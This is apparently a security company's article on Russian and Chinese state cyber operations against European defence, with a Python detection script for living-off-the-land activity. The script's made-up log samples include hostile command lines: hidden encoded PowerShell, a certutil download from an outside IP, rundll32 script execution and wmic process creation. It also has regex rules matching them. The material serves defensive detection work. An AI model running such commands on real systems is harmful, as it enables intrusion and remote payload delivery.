
Cyber security in the Defence Domain
Tactics, Threats, and the Urgency of European Autonomy
The war in Ukraine, rising tensions in the Baltic region, and instability along NATO's and the EU's eastern borders mark a period of structural unrest. Where attention was once focused primarily on physical threats, a clear shift has occurred: the digital battlefield has evolved into a fully-fledged operational domain within defence. Cyber warfare is no longer a mere extension of traditional military operations; it is a core component of them.
The Active Cyber Landscape — China and Russia
Nation states, particularly Russia and China, are intensifying their digital operations against Europe and its allies. These activities go well beyond traditional espionage. They have become more structured, persistent, and technically sophisticated.
From Russia, we observe a mix of military intelligence (GRU) operations, foreign intelligence (SVR) espionage, and civilian or semi-state hacktivist groups capable of destructive cyberattacks. The SolarWinds supply chain compromise, attributed to the SVR, shows the reach of Russian espionage, while NotPetya, attributed to the GRU, and recent targeted campaigns against NATO members illustrate both the capacity and the willingness to cripple digital infrastructure.
China takes a more long-term strategic approach, focusing on intellectual property theft, pre-positioning inside critical infrastructure, and establishing persistent strategic network access. Campaigns attributed to APT10 (also tracked as Red Apollo), APT41, and more recently Volt Typhoon reveal how consistently China deploys cyber capabilities to gain geopolitical and economic advantage.
Common Tactics of State Actors
Within the defence domain, nation-state tactics have become increasingly refined. Common techniques include:
- Supply chain compromise: As seen in the SolarWinds incident, attackers abuse a legitimate vendor's software or update channel to reach a wide range of that vendor's customers at once
- Living off the land (LotL): Using native tools and processes already present in the victim environment, so that malicious activity blends in with legitimate administration and avoids detection
- Zero-day exploits: Leveraging previously unknown vulnerabilities to gain initial access or maintain persistence
- Wiper malware: Destructive malware that wipes or corrupts data and boot structures so that systems cannot be recovered, such as NotPetya or HermeticWiper
- Psychological and information warfare: Merging cyberattacks with disinformation campaigns to destabilize public opinion, decision-making, and military command structures
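Living off the land is hard to spot precisely because every tool involved is also used legitimately, so detection engineering looks for abnormal invocations and correlates several weak signals per host. The following Python script is an added example written for this page (it is not DeepBlue's tooling or code from the original text): it scans constructed, made-up process-creation log lines for a few classic LotL patterns and groups the hits per host. The log format, rule set and hostnames are assumptions for the example; the ATT&CK technique IDs are the standard references for each behaviour.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample of Windows process-creation events (Security event 4688 style),
# flattened to one line each. These are made-up log lines for this example, not real telemetry.
SAMPLE_EVENTS = [
    "2024-03-01T09:12:03Z host=WS-014 user=j.doe parent=explorer.exe cmd=C:\\Windows\\System32\\notepad.exe report.txt",
    "2024-03-01T09:14:41Z host=WS-014 user=j.doe parent=WINWORD.EXE cmd=powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    "2024-03-01T09:15:02Z host=WS-014 user=j.doe parent=powershell.exe cmd=certutil.exe -urlcache -split -f http://198.51.100.7/a.txt C:\\Users\\Public\\a.txt",
    "2024-03-01T09:15:20Z host=WS-014 user=j.doe parent=cmd.exe cmd=rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write()",
    "2024-03-01T09:16:00Z host=SRV-02 user=svc_backup parent=services.exe cmd=wmic.exe process call create \"cmd /c whoami\"",
    "2024-03-01T09:16:05Z host=SRV-02 user=admin parent=cmd.exe cmd=certutil.exe -hashfile C:\\installers\\agent.msi SHA256",
]

# Assumed line layout for this example: "<ts> host=<h> user=<u> parent=<image> cmd=<command line>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$"
)

# Command-line rules: (rule name, pattern, ATT&CK technique). Each pattern targets an
# invocation style that legitimate administration rarely needs, not the tool itself.
CMD_RULES = [
    ("encoded_powershell",
     re.compile(r"\bpowershell(?:\.exe)?\b.*\s-(?:e|ec|enc|encodedcommand)\b", re.I), "T1059.001"),
    ("certutil_download",
     re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b", re.I), "T1105"),
    ("rundll32_script",
     re.compile(r"\brundll32(?:\.exe)?\b.*\b(?:javascript|vbscript):", re.I), "T1218.011"),
    ("wmic_remote_exec",
     re.compile(r"\bwmic(?:\.exe)?\b.*\bprocess\s+call\s+create\b", re.I), "T1047"),
]

# Parent/child rule: an Office application spawning a script interpreter is a classic
# macro-delivered initial-execution pattern, regardless of what the command line looks like.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_CHILDREN = ("powershell", "cmd.exe", "wscript", "cscript", "mshta", "rundll32")


@dataclass(frozen=True)
class Finding:
    ts: str
    host: str
    user: str
    rule: str
    technique: str
    cmd: str


def scan(lines):
    """Apply the LotL rules to each parsable event; unparsable lines are skipped, not fatal."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        for name, rx, tid in CMD_RULES:
            if rx.search(ev["cmd"]):
                findings.append(Finding(ev["ts"], ev["host"], ev["user"], name, tid, ev["cmd"]))
        parts = ev["cmd"].split()
        child = parts[0].rsplit("\\", 1)[-1].lower() if parts else ""
        if ev["parent"].lower() in OFFICE_PARENTS and child.startswith(SCRIPT_CHILDREN):
            findings.append(Finding(ev["ts"], ev["host"], ev["user"],
                                    "office_spawns_interpreter", "T1204.002", ev["cmd"]))
    return findings


def techniques_by_host(findings):
    """Distinct techniques seen per host. Several different LotL techniques on one host
    within minutes is a far stronger signal than any single hit, because each tool on its
    own has legitimate uses (compare the benign certutil -hashfile event above)."""
    per_host = defaultdict(set)
    for f in findings:
        per_host[f.host].add(f.technique)
    return {host: sorted(techs) for host, techs in per_host.items()}


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f.ts} {f.host} {f.user} {f.rule} ({f.technique}): {f.cmd}")
    for host, techs in techniques_by_host(hits).items():
        print(f"{host}: {len(techs)} distinct technique(s) {techs}")
```

In a real deployment the rules would be tuned against a baseline of the environment's own administrative activity, and the per-host correlation would be bounded by a time window; both are left out here to keep the logic readable.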
The Case for European Autonomy
Europe’s dependency on non-European technologies and security standards presents a structural risk. Building an independent European knowledge base and operational capability is no longer optional; it is urgent. This means investing in:
- European cryptographic standards
- Autonomous SOC and Threat Intelligence capabilities
- Cross-border collaboration between defence, government, and private cybersecurity experts
- Training and retaining cybersecurity professionals with domain expertise in defence and OT environments
Europe must move from consumer to creator, integrator, and innovator of cybersecurity solutions, ensuring digital sovereignty and strengthening the operational resilience of its defence domain.
The Role of Suppliers
Suppliers are vital to operational effectiveness in defence, yet they increasingly represent a vulnerable segment of the attack surface. In many supply chain attacks, smaller or less-secured vendors are the initial targets. A successful breach of such a supplier can escalate into a compromise of core Ministry of Defence systems or affiliated units.
Thus, it is critical that all vendors and subcontractors within the defence ecosystem meet demonstrably high security standards. This requires not only policy but also technical enforcement, such as:
- Network segmentation
- Zero trust architectures
- Mandatory penetration tests
- Logical separation within delivery systems
Our Experience in the Defence Domain
At DeepBlue Security & Intelligence, we are actively involved in securing digital ecosystems within critical infrastructure and defence operations. Our team has in-depth knowledge and hands-on experience with detection engineering, response execution, forensic investigations, and hardening of hybrid IT/OT environments, which are typical of defence-related networks.
Our approach combines technical depth, strategic insight, and independent advisory. We understand that in the defence sector, effective cyber resilience involves not only technical measures, but also policy and operational considerations.
In Short
Cyber warfare is not a future scenario; it is today’s reality. Defence organizations must structurally strengthen their digital posture by combining tactical resilience with strategic autonomy. The persistent threats posed by Russia and China clearly demonstrate that the offensive capabilities of nation-states are real and recurring. To maintain control over the digital battlefield, Europe must invest in its own expertise, tools, and operational structures.
Suppliers cannot be overlooked either; their resilience is a critical part of the bigger picture. DeepBlue is ready to be your independent, technically elite, and reliable partner in this mission.
www.deepbluesecurity.nl | info@deepbluesecurity.nl | +31 (0)70 800 2025